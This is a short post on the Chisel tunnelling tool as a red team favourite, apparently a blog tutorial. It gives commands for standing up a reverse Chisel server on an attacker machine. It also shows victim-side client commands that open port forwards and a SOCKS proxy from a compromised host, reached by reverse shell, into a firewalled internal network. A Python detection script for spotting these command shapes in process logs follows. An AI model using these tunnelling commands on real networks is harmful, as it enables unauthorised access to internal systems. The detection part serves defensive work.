Chisel – Favourite red team tool

Chisel

Introduction

Chisel is a fast TCP/UDP tunnel, transported over HTTP and secured via SSH. A single executable serves as both client and server. More details about this tool can be found here.

Why is it useful?

A corporate network is not accessible from the internet because it is blocked by a firewall. Chisel helps create a proxy connection, and it can then connect to any internal network that is accessible from the box.

How to use?

Download the chisel executable on the attack and victim machines. Access to the victim machine is normally via a reverse shell.

On the attacker machine, stand up the Chisel server on port 8081:

chisel server -p 8081 --reverse

On the victim machine, there are multiple ways to launch the Chisel client:

chisel client <attackerip>:8081 R:80:<Target internal network>:<Target internal port>

The above command makes the attacker machine listen on port 80 and forward all connections to the victim’s target machine on the specified port.

chisel client <attacker-ip>:8081 R:socks

The above command creates a SOCKS5 listener on port 1080 of the attacker machine and then connects to the victim’s internal machine. It is accessible via proxychains and FoxyProxy in the browser.

e.g. proxychains git clone <victim’s internal ip> or proxychains curl <victim’s internal ip>
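
The two reverse-remote forms shown above (R:<port>:<host>:<port> and R:socks) are also what a defender can key on in process-creation logs. The following is an added example, not part of the original post or the Chisel project: a Python check run over constructed sample log lines. The "host | command line" log format, the host names and the addresses are assumptions made for illustration.

```python
import re

# Reverse-remote argument shapes shown on this page.
REVERSE_FORWARD = re.compile(r"^R:(\d{1,5}):([^:\s]+):(\d{1,5})$")
REVERSE_SOCKS = "R:socks"
SERVER_ADDR = re.compile(r"^(?:https?://)?([^:/\s]+):(\d{1,5})$")

# Constructed sample input: "<host> | <process command line>" (assumed format).
SAMPLE_LOG = """\
web01 | /tmp/updater client 203.0.113.10:8081 R:80:10.0.0.5:8080
web01 | /usr/bin/curl http://10.0.0.5:8080/health
db02 | C:\\Temp\\svc.exe client 203.0.113.10:8081 R:socks
jump | ./chisel server -p 8081 --reverse
"""


def classify(cmdline):
    """Return a list of (kind, detail) findings for one command line."""
    argv = cmdline.split()
    findings = []
    # Key on the subcommand and argument shape, not on the binary name,
    # because the executable can be saved under any file name.
    if "server" in argv[1:] and "--reverse" in argv:
        findings.append(("reverse-server", "server accepts reverse remotes"))
    if "client" in argv[1:]:
        rest = argv[argv.index("client", 1) + 1:]
        # First host:port argument after "client" is the tunnel server.
        server = next((a for a in rest if SERVER_ADDR.match(a)), None)
        for arg in rest:
            m = REVERSE_FORWARD.match(arg)
            if arg == REVERSE_SOCKS:
                findings.append(
                    ("reverse-socks", f"{server}: SOCKS5 listener on server port 1080"))
            elif m:
                findings.append(
                    ("reverse-forward", f"{server}: server port {m[1]} -> {m[2]}:{m[3]}"))
    return findings


def scan(log_text):
    """Run classify() over every log line and return (host, kind, detail) hits."""
    hits = []
    for line in log_text.splitlines():
        host, _, cmdline = line.partition(" | ")
        for kind, detail in classify(cmdline):
            hits.append((host.strip(), kind, detail))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="\t")
```

A hit on an internal host is best correlated with an outbound HTTP connection from the same process to the reported server address.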

Conclusion

Chisel is a Swiss Army knife and a red team favourite for establishing proxy connections to internal networks that are mostly blocked by the firewall.

